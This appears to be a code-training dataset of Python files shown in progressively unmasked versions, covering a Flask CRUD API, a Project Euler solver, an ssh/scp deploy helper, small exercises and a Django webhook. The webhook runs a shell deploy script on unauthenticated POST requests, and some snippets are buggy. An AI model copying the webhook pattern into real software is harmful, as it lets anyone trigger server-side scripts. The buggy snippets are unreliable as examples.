data, error = driver_schema.load(req_data, partial=True)
if error:
return custom_response({'Error': 'Invalid driver data.'}, 400)
driver = DriverModel.get_one_driver(driver_id)
driver.update(data)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['DELETE'])
def delete(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 400)
driver.delete()
return custom_response({'Success': 'Driver deleted with success!'}, 200)
@driver_api.route('/list_not_loaded', methods=['GET'])
def list_truck_not_loaded():
driver = DriverModel.truck_not_loaded()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
@driver_api.route('/list_trucks_owned', methods=['GET'])
def list_truck_owned():
driver = DriverModel.truck_owned()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
def custom_response(response, status_code):
return Response(mimetype='application/json', response=json.dumps(
response), status=status_code)
| from flask import request, json, Response, Blueprint
from ..models.DriverModel import DriverModel, DriverSchema
driver_api = Blueprint('drivers', __name__)
driver_schema = DriverSchema()
@driver_api.route('/', methods=['POST'])
def create():
req_data = request.get_json()
data, error = driver_schema.load(req_data)
if error:
return custom_response(error, 400)
driver_in_db = DriverModel.get_driver_by_name(data.get('name'))
if driver_in_db:
return custom_response({'Error': 'Driver already exists.'}, 400)
driver = DriverModel(data)
driver.save()
response = driver_schema.dump(driver).data
return custom_response(response, 201)
@driver_api.route('/<int:driver_id>', methods=['GET'])
def get(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 404)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['PUT'])
def update(driver_id):
req_data = request.get_json()
data, error = driver_schema.load(req_data, partial=True)
if error:
return custom_response({'Error': 'Invalid driver data.'}, 400)
driver = DriverModel.get_one_driver(driver_id)
driver.update(data)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['DELETE'])
def delete(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 400)
driver.delete()
return custom_response({'Success': 'Driver deleted with success!'}, 200)
@driver_api.route('/list_not_loaded', methods=['GET'])
def list_truck_not_loaded():
driver = DriverModel.truck_not_loaded()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
@driver_api.route('/list_trucks_owned', methods=['GET'])
def list_truck_owned():
driver = DriverModel.truck_owned()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
def custom_response(response, status_code):
return Response(
mimetype="application/json",
response=json.dumps(response),
status=status_code
)
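# Hedged usage sketch (app module is illustrative):
#     from flask import Flask
#     app = Flask(__name__)
#     app.register_blueprint(driver_api, url_prefix='/api/v1/drivers')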
| [
2,
5,
7,
9,
10
] |
1,691 | 7ca7693b842700a7b15242b656648e8a7e58cd23 | <mask token>
def isPrime(num):
if num <= 1:
return False
elif num == 2:
return True
elif num % 2 == 0:
return False
else:
sqrt_num = math.sqrt(num)
bound = int(sqrt_num) + 1
for i in range(3, bound, 2):
if num % i == 0:
return False
return True
def permutate(arr, n):
if n == len(arr):
str_num = ''
for j in range(n):
str_num += str(arr[j])
num = int(str_num)
if isPrime(num):
global maxPandigitalPrime
if num > maxPandigitalPrime:
maxPandigitalPrime = num
else:
for i in range(n, len(arr)):
temp = arr[i]
arr[i] = arr[n]
arr[n] = temp
permutate(arr, n + 1)
temp = arr[i]
arr[i] = arr[n]
arr[n] = temp
<mask token>
| <mask token>
def isPrime(num):
if num <= 1:
return False
elif num == 2:
return True
elif num % 2 == 0:
return False
else:
sqrt_num = math.sqrt(num)
bound = int(sqrt_num) + 1
for i in range(3, bound, 2):
if num % i == 0:
return False
return True
def permutate(arr, n):
if n == len(arr):
str_num = ''
for j in range(n):
str_num += str(arr[j])
num = int(str_num)
if isPrime(num):
global maxPandigitalPrime
if num > maxPandigitalPrime:
maxPandigitalPrime = num
else:
for i in range(n, len(arr)):
temp = arr[i]
arr[i] = arr[n]
arr[n] = temp
permutate(arr, n + 1)
temp = arr[i]
arr[i] = arr[n]
arr[n] = temp
<mask token>
for digit in range(2, 9):
arr = list(range(1, digit + 1))
permutate(arr, 0)
print(maxPandigitalPrime)
<mask token>
print(toc - tic)
| <mask token>
maxPandigitalPrime = 2
def isPrime(num):
if num <= 1:
return False
elif num == 2:
return True
elif num % 2 == 0:
return False
else:
sqrt_num = math.sqrt(num)
bound = int(sqrt_num) + 1
for i in range(3, bound, 2):
if num % i == 0:
return False
return True
def permutate(arr, n):
if n == len(arr):
str_num = ''
for j in range(n):
str_num += str(arr[j])
num = int(str_num)
if isPrime(num):
global maxPandigitalPrime
if num > maxPandigitalPrime:
maxPandigitalPrime = num
else:
for i in range(n, len(arr)):
temp = arr[i]
arr[i] = arr[n]
arr[n] = temp
permutate(arr, n + 1)
temp = arr[i]
arr[i] = arr[n]
arr[n] = temp
tic = time.time()
for digit in range(2, 9):
arr = list(range(1, digit + 1))
permutate(arr, 0)
print(maxPandigitalPrime)
toc = time.time()
print(toc - tic)
| <mask token>
import time
import math
maxPandigitalPrime = 2
def isPrime(num):
if num <= 1:
return False
elif num == 2:
return True
elif num % 2 == 0:
return False
else:
sqrt_num = math.sqrt(num)
bound = int(sqrt_num) + 1
for i in range(3, bound, 2):
if num % i == 0:
return False
return True
def permutate(arr, n):
if n == len(arr):
str_num = ''
for j in range(n):
str_num += str(arr[j])
num = int(str_num)
if isPrime(num):
global maxPandigitalPrime
if num > maxPandigitalPrime:
maxPandigitalPrime = num
else:
for i in range(n, len(arr)):
temp = arr[i]
arr[i] = arr[n]
arr[n] = temp
permutate(arr, n + 1)
temp = arr[i]
arr[i] = arr[n]
arr[n] = temp
tic = time.time()
for digit in range(2, 9):
arr = list(range(1, digit + 1))
permutate(arr, 0)
print(maxPandigitalPrime)
toc = time.time()
print(toc - tic)
| '''
Project Euler
Problem #41 - Pandigital prime
David 07/06/2017
'''
import time
import math
maxPandigitalPrime = 2
def isPrime(num):
if(num<=1):
return False
elif(num==2):
return True
elif(num%2==0):
return False
else:
sqrt_num = math.sqrt(num)
bound = int(sqrt_num)+1
for i in range(3,bound,2):
if(num%i==0):
return False
return True
def permutate(arr,n):
if(n==len(arr)):
#print(arr)
str_num = ''
for j in range(n):
str_num += str(arr[j])
num = int(str_num)
if(isPrime(num)):
global maxPandigitalPrime
if(num>maxPandigitalPrime):
maxPandigitalPrime = num
else:
for i in range(n,len(arr)):
# swap index n(head), i
temp = arr[i]
arr[i] = arr[n]
arr[n] = temp
permutate(arr,n+1)
# swap back to resume arr
temp = arr[i]
arr[i] = arr[n]
arr[n] = temp
# main
tic = time.time()
for digit in range(2,9):
arr = list(range(1,digit+1))
permutate(arr,0)
print(maxPandigitalPrime)
toc = time.time()
print(toc-tic)
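# Editor's note: 8- and 9-digit pandigitals have digit sums 36 and 45, both
# divisible by 3, so they can never be prime; that is why range(2, 9) is
# sufficient and the final maximum is the 7-digit prime 7652413.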
| [
2,
3,
4,
5,
6
] |
1,692 | bbdb07a81d785bdf067707c4e56622a2ada76b7b | <mask token>
| from .ffm import *
from .fm import *
from .utils import *
from .base_model import *
from .base_trainer import *
from .logger import *
from .metric import *
from .input_fn import *
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/8/15 5:04 PM
# @Author : Zessay
from .ffm import *
from .fm import *
from .utils import *
from .base_model import *
from .base_trainer import *
from .logger import *
from .metric import *
from .input_fn import * | null | null | [
0,
1,
2
] |
1,693 | a998433e45c1d5135749c5164e8ec1f2eb0e572a | <mask token>
| from job_description import JobDescription
from resume import Resume
from resume_manager import ResumeManager
| null | null | null | [
0,
1
] |
1,694 | 6f5bca8c1afcd9d9971a64300a576ca2b2f6ef70 | <mask token>
| <mask token>
class HookView(APIView):
<mask token>
| <mask token>
class HookView(APIView):
def post(self, request, *args, **kwargs):
SCRIPT_PATH = os.path.join(settings.BASE_DIR, 'deploy/hooks.sh')
payload = json.loads(request.data['payload'])
ref = payload['ref']
if ref == 'refs/heads/deploy':
output = subprocess.run(['bash', SCRIPT_PATH], capture_output=True, text=True).stdout
return Response(status=status.HTTP_200_OK, data=output)
return Response(status=status.HTTP_400_BAD_REQUEST)
| from django.shortcuts import render
from rest_framework import status
from rest_framework.views import APIView
from rest_framework.response import Response
from django.conf import settings
import subprocess
import os
import json
class HookView(APIView):
def post(self, request, *args, **kwargs):
SCRIPT_PATH = os.path.join(settings.BASE_DIR, 'deploy/hooks.sh')
payload = json.loads(request.data['payload'])
ref = payload['ref']
if ref == 'refs/heads/deploy':
output = subprocess.run(['bash', SCRIPT_PATH], capture_output=True, text=True).stdout
return Response(status=status.HTTP_200_OK, data=output)
return Response(status=status.HTTP_400_BAD_REQUEST)
| from django.shortcuts import render
from rest_framework import status
from rest_framework.views import APIView
from rest_framework.response import Response
from django.conf import settings
import subprocess
import os
import json
class HookView(APIView):
def post(self, request, *args, **kwargs):
SCRIPT_PATH = os.path.join(settings.BASE_DIR, 'deploy/hooks.sh')
# payload from webhook
payload = json.loads(request.data['payload'])
ref = payload['ref']
if ref == 'refs/heads/deploy':
output = subprocess.run(['bash', SCRIPT_PATH], capture_output=True, text=True).stdout
return Response(status=status.HTTP_200_OK, data=output)
return Response(status=status.HTTP_400_BAD_REQUEST)
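# Editor's note (hedged sketch): a production hook would also verify
# GitHub's HMAC signature before running anything; SECRET is an assumed
# shared-secret bytes value, not part of the original file:
#
#     import hmac, hashlib
#     digest = hmac.new(SECRET, request.body, hashlib.sha1).hexdigest()
#     expected = request.META.get('HTTP_X_HUB_SIGNATURE', '')
#     valid = hmac.compare_digest('sha1=' + digest, expected)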
| [
0,
1,
2,
3,
4
] |
1,695 | b210784a198eaa3e57b5a65ec182a746aecc0e2b | <mask token>
class Ninja:
def __init__(self, first_name, last_name, treats, pet_food, pet):
self.first_name = first_name
self.last_name = last_name
self.treats = treats
self.pet_food = pet_food
self.pet = pet
<mask token>
<mask token>
def bathe(self):
self.pet.noise()
<mask token>
| <mask token>
class Ninja:
def __init__(self, first_name, last_name, treats, pet_food, pet):
self.first_name = first_name
self.last_name = last_name
self.treats = treats
self.pet_food = pet_food
self.pet = pet
def walk(self):
self.pet.play()
def feed(self):
self.pet.eat()
def bathe(self):
self.pet.noise()
<mask token>
| <mask token>
class Ninja:
def __init__(self, first_name, last_name, treats, pet_food, pet):
self.first_name = first_name
self.last_name = last_name
self.treats = treats
self.pet_food = pet_food
self.pet = pet
def walk(self):
self.pet.play()
def feed(self):
self.pet.eat()
def bathe(self):
self.pet.noise()
<mask token>
Naruto.feed()
print(Naruto.pet.energy)
print(Naruto.pet.health)
Naruto.bathe()
Naruto.walk()
print(Naruto.pet.energy)
print(Naruto.pet.health)
| <mask token>
class Ninja:
def __init__(self, first_name, last_name, treats, pet_food, pet):
self.first_name = first_name
self.last_name = last_name
self.treats = treats
self.pet_food = pet_food
self.pet = pet
def walk(self):
self.pet.play()
def feed(self):
self.pet.eat()
def bathe(self):
self.pet.noise()
Fox = Pet('Ninetailed Fox', 'Fox', 'Fire-Breathing')
Naruto = Ninja('Naruto', 'Izumaki', 'Rice Balls', 'Ground Beef', Fox)
Naruto.feed()
print(Naruto.pet.energy)
print(Naruto.pet.health)
Naruto.bathe()
Naruto.walk()
print(Naruto.pet.energy)
print(Naruto.pet.health)
| from pet import Pet
class Ninja:
def __init__(self, first_name, last_name, treats, pet_food, pet):
self.first_name = first_name
self.last_name = last_name
self.treats = treats
self.pet_food = pet_food
self.pet = pet
def walk(self):
self.pet.play()
def feed(self):
self.pet.eat()
def bathe(self):
self.pet.noise()
Fox = Pet("Ninetailed Fox", "Fox", "Fire-Breathing")
Naruto = Ninja("Naruto", "Izumaki", "Rice Balls", "Ground Beef", Fox)
Naruto.feed()
print(Naruto.pet.energy)
print(Naruto.pet.health)
Naruto.bathe()
Naruto.walk()
print(Naruto.pet.energy)
print(Naruto.pet.health) | [
3,
5,
6,
7,
9
] |
1,696 | f3ff453655d7938cb417ce212f3836fabafaea43 | <mask token>
| def interseccao_chaves(lis_dic):
lista = []
for dic1 in lis_dic[0]:
for cahves in dic1:
lista.append(dic1)
for dic2 in lis_dic[1]:
for cahves in dic2:
lista.append(dic2)
return lista
| null | null | null | [
0,
1
] |
1,697 | 2c834c734de8f8740176bb5dbb6b123c49924718 | <mask token>
class color:
PURPLE = '\x1b[95m'
CYAN = '\x1b[96m'
DARKCYAN = '\x1b[36m'
BLUE = '\x1b[94m'
GREEN = '\x1b[92m'
YELLOW = '\x1b[93m'
RED = '\x1b[91m'
BOLD = '\x1b[1m'
UNDERLINE = '\x1b[4m'
END = '\x1b[0m'
<mask token>
def hostIsUp(host):
if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):
return False
return True
<mask token>
def updateFileServer(config, serverName):
ip = getIpServerName(config, serverName)
out = subprocess.run(['tar', 'czf',
'/tmp/SDTD-Mazerunner-Script.tar.gz', '.'], cwd=os.getcwd(), stdout
=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)
if out.returncode == 0:
logging.info('Compressing directory done [success]')
else:
logging.error('Compressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'sudo rm -rf SDTD-Mazerunner/script/'])
out = subprocess.run(['scp', '-pq', '-o', 'StrictHostKeyChecking=no',
'-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz', 'xnet@' +
ip + ':~/'], check=True)
if out.returncode == 0:
logging.info('Transfer done [success]')
else:
logging.error('Transferring files failed [error]')
logging.info('Detar file ...')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'mkdir -p SDTD-Mazerunner/script'])
out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])
if out.returncode == 0:
logging.info('Decompressing directory done [success]')
else:
logging.error('Decompressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'rm SDTD-Mazerunner-Script.tar.gz'])
return
def installEnvironmentServer(config, serverName):
ip = getIpServerName(config, serverName)
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'source ~/.profile; ./script/install_config_machine.py'])
return
| <mask token>
class color:
PURPLE = '\x1b[95m'
CYAN = '\x1b[96m'
DARKCYAN = '\x1b[36m'
BLUE = '\x1b[94m'
GREEN = '\x1b[92m'
YELLOW = '\x1b[93m'
RED = '\x1b[91m'
BOLD = '\x1b[1m'
UNDERLINE = '\x1b[4m'
END = '\x1b[0m'
<mask token>
def getIp():
ip = os.popen(
'ifconfig ens3 | grep "inet ad" | cut -f2 -d: | awk \'{print $1}\'',
'r').read()
ip = ip.replace('\n', '')
return ip
<mask token>
def hostIsUp(host):
if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):
return False
return True
def getIpServerName(config, serverName):
ip = ''
value = serverName.split('-')
if len(value) == 2:
try:
hosts = config.get(value[0], 'hosts').split(',')
ip = hosts[int(value[1]) - 1].strip(' \n')
except:
return ip
return ip
def updateFileServer(config, serverName):
ip = getIpServerName(config, serverName)
out = subprocess.run(['tar', 'czf',
'/tmp/SDTD-Mazerunner-Script.tar.gz', '.'], cwd=os.getcwd(), stdout
=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)
if out.returncode == 0:
logging.info('Compressing directory done [success]')
else:
logging.error('Compressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'sudo rm -rf SDTD-Mazerunner/script/'])
out = subprocess.run(['scp', '-pq', '-o', 'StrictHostKeyChecking=no',
'-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz', 'xnet@' +
ip + ':~/'], check=True)
if out.returncode == 0:
logging.info('Transfer done [success]')
else:
logging.error('Transferring files failed [error]')
logging.info('Detar file ...')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'mkdir -p SDTD-Mazerunner/script'])
out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])
if out.returncode == 0:
logging.info('Decompressing directory done [success]')
else:
logging.error('Decompressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'rm SDTD-Mazerunner-Script.tar.gz'])
return
def installEnvironmentServer(config, serverName):
ip = getIpServerName(config, serverName)
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'source ~/.profile; ./script/install_config_machine.py'])
return
| <mask token>
class color:
PURPLE = '\x1b[95m'
CYAN = '\x1b[96m'
DARKCYAN = '\x1b[36m'
BLUE = '\x1b[94m'
GREEN = '\x1b[92m'
YELLOW = '\x1b[93m'
RED = '\x1b[91m'
BOLD = '\x1b[1m'
UNDERLINE = '\x1b[4m'
END = '\x1b[0m'
def getHostsByKey(config, key):
hosts = config.get(key, 'hosts').split(',')
index = 0
for host in hosts:
hosts[index] = host.strip(' \n')
index += 1
return hosts
def getIp():
ip = os.popen(
'ifconfig ens3 | grep "inet ad" | cut -f2 -d: | awk \'{print $1}\'',
'r').read()
ip = ip.replace('\n', '')
return ip
<mask token>
def deleteLineWithString(pathFile, stringResearch):
contenu = ''
fichier = open(pathFile, 'r')
for ligne in fichier:
if not stringResearch in ligne:
contenu += ligne
fichier.close()
fichier = open('tmp.txt', 'w')
fichier.write(contenu)
fichier.close()
os.system('sudo mv tmp.txt /etc/hosts >> /dev/null 2>&1')
return
def hostIsUp(host):
if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):
return False
return True
def getIpServerName(config, serverName):
ip = ''
value = serverName.split('-')
if len(value) == 2:
try:
hosts = config.get(value[0], 'hosts').split(',')
ip = hosts[int(value[1]) - 1].strip(' \n')
except:
return ip
return ip
def updateFileServer(config, serverName):
ip = getIpServerName(config, serverName)
out = subprocess.run(['tar', 'czf',
'/tmp/SDTD-Mazerunner-Script.tar.gz', '.'], cwd=os.getcwd(), stdout
=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)
if out.returncode == 0:
logging.info('Compressing directory done [success]')
else:
logging.error('Compressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'sudo rm -rf SDTD-Mazerunner/script/'])
out = subprocess.run(['scp', '-pq', '-o', 'StrictHostKeyChecking=no',
'-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz', 'xnet@' +
ip + ':~/'], check=True)
if out.returncode == 0:
logging.info('Transfer done [success]')
else:
logging.error('Transferring files failed [error]')
logging.info('Detar file ...')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'mkdir -p SDTD-Mazerunner/script'])
out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])
if out.returncode == 0:
logging.info('Decompressing directory done [success]')
else:
logging.error('Decompressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'rm SDTD-Mazerunner-Script.tar.gz'])
return
def installEnvironmentServer(config, serverName):
ip = getIpServerName(config, serverName)
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'source ~/.profile; ./script/install_config_machine.py'])
return
| <mask token>
class color:
PURPLE = '\x1b[95m'
CYAN = '\x1b[96m'
DARKCYAN = '\x1b[36m'
BLUE = '\x1b[94m'
GREEN = '\x1b[92m'
YELLOW = '\x1b[93m'
RED = '\x1b[91m'
BOLD = '\x1b[1m'
UNDERLINE = '\x1b[4m'
END = '\x1b[0m'
def getHostsByKey(config, key):
hosts = config.get(key, 'hosts').split(',')
index = 0
for host in hosts:
hosts[index] = host.strip(' \n')
index += 1
return hosts
def getIp():
ip = os.popen(
'ifconfig ens3 | grep "inet ad" | cut -f2 -d: | awk \'{print $1}\'',
'r').read()
ip = ip.replace('\n', '')
return ip
def isAlreadyAdd(pathFile, string):
file = open(pathFile)
for line in file:
if string in line:
return True
return False
def deleteLineWithString(pathFile, stringResearch):
contenu = ''
fichier = open(pathFile, 'r')
for ligne in fichier:
if not stringResearch in ligne:
contenu += ligne
fichier.close()
fichier = open('tmp.txt', 'w')
fichier.write(contenu)
fichier.close()
os.system('sudo mv tmp.txt /etc/hosts >> /dev/null 2>&1')
return
def hostIsUp(host):
if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):
return False
return True
def getIpServerName(config, serverName):
ip = ''
value = serverName.split('-')
if len(value) == 2:
try:
hosts = config.get(value[0], 'hosts').split(',')
ip = hosts[int(value[1]) - 1].strip(' \n')
except:
return ip
return ip
def updateFileServer(config, serverName):
ip = getIpServerName(config, serverName)
out = subprocess.run(['tar', 'czf',
'/tmp/SDTD-Mazerunner-Script.tar.gz', '.'], cwd=os.getcwd(), stdout
=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)
if out.returncode == 0:
logging.info('Compressing directory done [success]')
else:
logging.error('Compressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'sudo rm -rf SDTD-Mazerunner/script/'])
out = subprocess.run(['scp', '-pq', '-o', 'StrictHostKeyChecking=no',
'-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz', 'xnet@' +
ip + ':~/'], check=True)
if out.returncode == 0:
logging.info('Transfer done [success]')
else:
logging.error('Transferring files failed [error]')
logging.info('Detar file ...')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'mkdir -p SDTD-Mazerunner/script'])
out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])
if out.returncode == 0:
logging.info('Decompressing directory done [success]')
else:
logging.error('Decompressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'rm SDTD-Mazerunner-Script.tar.gz'])
return
def installEnvironmentServer(config, serverName):
ip = getIpServerName(config, serverName)
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'source ~/.profile; ./script/install_config_machine.py'])
return
| #!/usr/bin/env python3
import os
import subprocess
import logging
class color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
# Recover all ip for one component. Return format ip
def getHostsByKey(config, key):
hosts = config.get(key, "hosts").split(',')
index = 0
for host in hosts:
hosts[index] = host.strip(' \n')
index += 1
return hosts
# Function who return the ip of the current machine
def getIp():
ip = os.popen('ifconfig ens3 | grep "inet ad" | cut -f2 -d: | awk \'{print $1}\'', "r").read()
ip = ip.replace('\n', '')
return ip
# Check if String il already present in the file
def isAlreadyAdd(pathFile, string):
file = open(pathFile)
for line in file:
if string in line:
return True
return False
def deleteLineWithString(pathFile, stringResearch):
contenu = ""
fichier = open(pathFile, "r")
for ligne in fichier:
if not (stringResearch in ligne):
contenu += ligne
fichier.close()
fichier = open('tmp.txt', 'w')
fichier.write(contenu)
fichier.close()
os.system('sudo mv tmp.txt /etc/hosts >> /dev/null 2>&1')
return
# Function for check host
def hostIsUp(host):
if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):
return False
return True
# Function for recover ip by using server name
def getIpServerName(config, serverName):
ip = ""
value = serverName.split('-')
if len(value) == 2:
try:
hosts = config.get(value[0], "hosts").split(',')
ip = hosts[int(value[1]) - 1].strip(' \n')
except:
return ip
return ip
# Function for update file on specific server
def updateFileServer(config, serverName):
ip = getIpServerName(config, serverName)
out = subprocess.run(['tar', 'czf', '/tmp/SDTD-Mazerunner-Script.tar.gz', '.'],
cwd=os.getcwd(),
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)
if out.returncode == 0:
logging.info("Compressing directory done [success]")
else:
logging.error("Compressing directory failed [error]")
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,
'sudo rm -rf SDTD-Mazerunner/script/'])
out = subprocess.run(
['scp', '-pq', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz',
'xnet@' + ip + ':~/'], check=True)
if out.returncode == 0:
logging.info("Transfer done [success]")
else:
logging.error("Transferring files failed [error]")
logging.info("Detar file ...")
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,
'mkdir -p SDTD-Mazerunner/script'])
out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,
'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])
if out.returncode == 0:
logging.info("Decompressing directory done [success]")
else:
logging.error("Decompressing directory failed [error]")
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,
'rm SDTD-Mazerunner-Script.tar.gz'])
return
# Function for install basic environment
def installEnvironmentServer(config, serverName):
ip = getIpServerName(config, serverName)
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,
'source ~/.profile; ./script/install_config_machine.py'])
return
| [
5,
7,
9,
10,
12
] |
1,698 | ab4c668c8a167f8c387199b7aa49aa742d563250 | <mask token>
| <mask token>
print(md5.hexdigest())
<mask token>
print(sha1.hexdigest())
<mask token>
print(sha224.hexdigest())
<mask token>
print(sha256.hexdigest())
<mask token>
print(sha384.hexdigest())
<mask token>
print(sha512.hexdigest())
| <mask token>
md5 = hashlib.md5(b'Najmul')
print(md5.hexdigest())
sha1 = hashlib.sha1(b'Najmul')
print(sha1.hexdigest())
sha224 = hashlib.sha224(b'Najmul')
print(sha224.hexdigest())
sha256 = hashlib.sha256(b'Najmul')
print(sha256.hexdigest())
sha384 = hashlib.sha384(b'Najmul')
print(sha384.hexdigest())
sha512 = hashlib.sha512(b'Najmul')
print(sha512.hexdigest())
| import hashlib
md5 = hashlib.md5(b'Najmul')
print(md5.hexdigest())
sha1 = hashlib.sha1(b'Najmul')
print(sha1.hexdigest())
sha224 = hashlib.sha224(b'Najmul')
print(sha224.hexdigest())
sha256 = hashlib.sha256(b'Najmul')
print(sha256.hexdigest())
sha384 = hashlib.sha384(b'Najmul')
print(sha384.hexdigest())
sha512 = hashlib.sha512(b'Najmul')
print(sha512.hexdigest())
| null | [
0,
1,
2,
3
] |
1,699 | 99e6e734c7d638e3cf4d50d9605c99d5e700e82a | <mask token>
| <mask token>
if year % 4 == 0 and not year % 100 == 0:
print('YES')
elif year % 400 == 0:
print('yes')
else:
print('NO')
| year = int(input('enter the year '))
if year % 4 == 0 and not year % 100 == 0:
print('YES')
elif year % 400 == 0:
print('yes')
else:
print('NO')
| # Given a natural number, determine whether the year with that number is a leap year.
# If the year is a leap year, print `YES`; otherwise print `NO`.
# Recall that, under the Gregorian calendar, a year is a leap year
# if its number is divisible by 4 but not by 100, and also if it is divisible by 400.
year = int(input('enter the year '))
if year % 4 == 0 and not year % 100 == 0:
print('YES')
elif year % 400 == 0:
print('yes')
else:
print('NO')
| null | [
0,
1,
2,
3
] |